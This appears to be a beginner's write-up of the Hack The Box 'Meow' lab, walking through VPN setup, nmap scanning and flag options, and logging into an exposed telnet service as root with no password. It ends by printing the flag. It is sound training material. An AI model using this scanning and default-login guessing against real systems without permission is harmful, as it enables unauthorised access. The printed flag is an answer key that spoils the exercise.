1. Intro

So, recently I thought to myself: "I want to do more HTB challenges!" And yet, here I was, not having done the basic ones.

The aim of this writeup will be to cover the introductory Starting Point section inside of HTB.

To begin with, Meow helps introduce us to a few concepts. Sure, it aims to show us around the terminal, but it also teaches us a bit about virtual machines - also known as VMs.

It recommends the usage of Pwnbox, which is a pre-configured Kali VM. However, I will be using my own computer system and a Kali WSL, so I opted for OpenVPN.

2. OpenVPN

This is an easy setup.

1. Download OpenVPN
2. Download the VPN from HTB and set it up via double-click
3. Profit

3. Ping

Now, in order to test if the connection to the host has been established (even though HTB is showing a blaring green connection), I entered my WSL terminal and did a simple...

┌──(morb㉿AllYourBase)-[~]

└─$ ping 10.129.1.17

PING 10.129.1.17 (10.129.1.17) 56(84) bytes of data.

64 bytes from 10.129.1.17: icmp_seq=1 ttl=62 time=591 ms

64 bytes from 10.129.1.17: icmp_seq=2 ttl=62 time=44.4 ms

64 bytes from 10.129.1.17: icmp_seq=3 ttl=62 time=46.1 ms

64 bytes from 10.129.1.17: icmp_seq=4 ttl=62 time=49.1 ms

64 bytes from 10.129.1.17: icmp_seq=5 ttl=62 time=43.6 ms

^C

--- 10.129.1.17 ping statistics ---

5 packets transmitted, 5 received, 0% packet loss, time 4005ms

rtt min/avg/max/mdev = 43.638/154.923/591.406/218.249 ms

So, cool. The two things (my PC and the target) have a connection, due to being on the same Virtual Private Network (VPN).

4. The Workflow

Reading through the provided PDF, I came across a few important bits of information, which told me about the algorithm I should follow, when hacking.

4.1. Enumeration in Pentesting

When starting a penetration test or security evaluation on a target, one of the first steps is Enumeration. This phase involves gathering as much information as possible about the target’s current state.

Since I am now on the same Virtual Private Network (VPN) as the target, I can access it directly, similar to any other user. For instance:

• If the target is a web server running a public web page, I can navigate to its IP address and explore the content.
• If it’s a storage server, I can use the same IP address to connect and explore its files and folders, provided I have the necessary credentials.

But how do you find these services? Manually searching for them would be inefficient and time-consuming. Every server communicates using ports to transmit data to clients. The Enumeration phase begins with scanning these open ports to understand the target’s purpose on the network and identify potential vulnerabilities in the running services.

To scan ports quickly, we use a tool called nmap. More details about its usage will be covered later.

Once I have identified open ports, I can manually access each service using various tools to determine if their contents are accessible. Each service may require a different tool or script for access, and this knowledge comes with time, practice, and thorough research. In fact, 90% of penetration testing involves researching the product you're testing, since technology evolves continuously and it’s impossible to know everything. The crucial skill is the ability to efficiently search for the information you need to stay up-to-date.

The key in Enumeration is not speed, but thoroughness. Missing a resource during this phase could mean overlooking a critical attack vector, potentially doubling or tripling your work time on the target.

4.2. Establishing a Stable Connection and Scanning Ports

Once the target has replied successfully to four ping requests, we can confirm that the connection is both established and stable. To stop the ping process, press CTRL+C on your keyboard, which will display as ^C in the terminal (usually marked in green). This action will return control of the terminal, allowing you to proceed to the next step: scanning the target's open ports to identify running services.

To begin scanning, we use nmap (Network Mapper), which sends requests to the target's ports. If a port responds, nmap will report it as open. Since different services run on different ports, we use the -sV flag for service detection, which helps identify the name and version of the running service.

Here's a sample nmap command for this step:

nmap -sV {target_IP}

4.3. Useful Nmap Tags for Penetration Testing

nmap is a versatile tool with many options for scanning and analysing target systems. Below are some useful nmap tags for penetration testing:

• -sS: TCP SYN Scan (Stealth Scan) – This scan type sends SYN packets to determine if ports are open without completing the TCP handshake, making it less likely to be logged by firewalls.
• -sV: Service Version Detection – Used to identify the services running on open ports and their versions, which helps in finding potential vulnerabilities.
• -O: Operating System Detection – Attempts to determine the target's operating system by analysing its responses to TCP/IP packets.
• -A: Aggressive Scan – Enables OS detection, version detection, script scanning, and traceroute all in one command. This is useful for getting detailed information quickly but may be noisy.
• -p: Port Specification – Allows you to specify particular ports to scan, which is helpful when targeting specific services or when a general scan takes too long (e.g., nmap -p 80,443 {target_IP} to scan only ports 80 and 443).
• -sU: UDP Scan – Scans for open UDP ports, which can be trickier than TCP scans since UDP doesn't provide confirmation like TCP SYN does.
• -Pn: No Ping – Skips host discovery (pinging), useful when ICMP requests are blocked, allowing you to go straight to scanning the ports.
• --script: Nmap Scripting Engine (NSE) – Allows the use of specialized scripts for tasks such as vulnerability detection or brute-forcing credentials. For example, nmap --script vuln {target_IP} will run scripts designed to detect common vulnerabilities.
• -T4: Timing Template – This speeds up scanning without sacrificing too much accuracy. Adjusting the timing can help when scanning slow networks or large ranges of IPs (T0 is the slowest, T5 the fastest).

Each of these flags can be combined to customize your scan based on your objective. For example:

nmap -sS -sV -O -p 1-1000 {target_IP}

This will run a stealth scan, detect services, identify the OS, and scan the first 1,000 ports of the target.

4.4. Hacking the thing

┌──(morb㉿AllYourBase)-[~]

└─$ sudo nmap -sV 10.129.1.17

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-04 13:11 CEST

Nmap scan report for 10.129.1.17

Host is up (0.25s latency).

Not shown: 999 closed tcp ports (reset)

PORT   STATE SERVICE VERSION

23/tcp open  telnet  Linux telnetd

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 18.85 seconds

We can see port 23/tcp, with telnet.

┌──(morb㉿AllYourBase)-[~]

└─$ telnet 10.129.1.17

Trying 10.129.1.17...

Connected to 10.129.1.17.

Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄

  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀

  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login:

Password:

Aaaand now we hit a wall. We need an username and password.

But luckily, because this is a beginner exercise, the login is obvious:

Meow login:

Password:

Login incorrect

Meow login: admin

Password:

Login incorrect

Meow login: administrator

Password:

Login incorrect

Meow login: root

Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com

 * Management:     https://landscape.canonical.com

 * Support:        https://ubuntu.com/advantage

  System information as of Fri 04 Oct 2024 11:16:48 AM UTC

  System load:           0.05

  Usage of /:            41.7% of 7.75GB

  Memory usage:          4%

  Swap usage:            0%

  Processes:             138

  Users logged in:       0

  IPv4 address for eth0: 10.129.1.17

  IPv6 address for eth0: dead:beef::250:56ff:fe94:6d14

 * Super-optimized for small spaces - read how we shrank the memory

   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.

31 of these updates are standard security updates.

To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.

To check for new updates run: sudo apt update

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0

root@Meow:~#

We basically just guessed it.

Now we rummage around a lil, and find the flag. Ez.

root@Meow:~# ls

flag.txt  snap

root@Meow:~#

root@Meow:~# cat flag.txt

b40abdfe23665f766f9c61ecba8a4c19

root@Meow:~#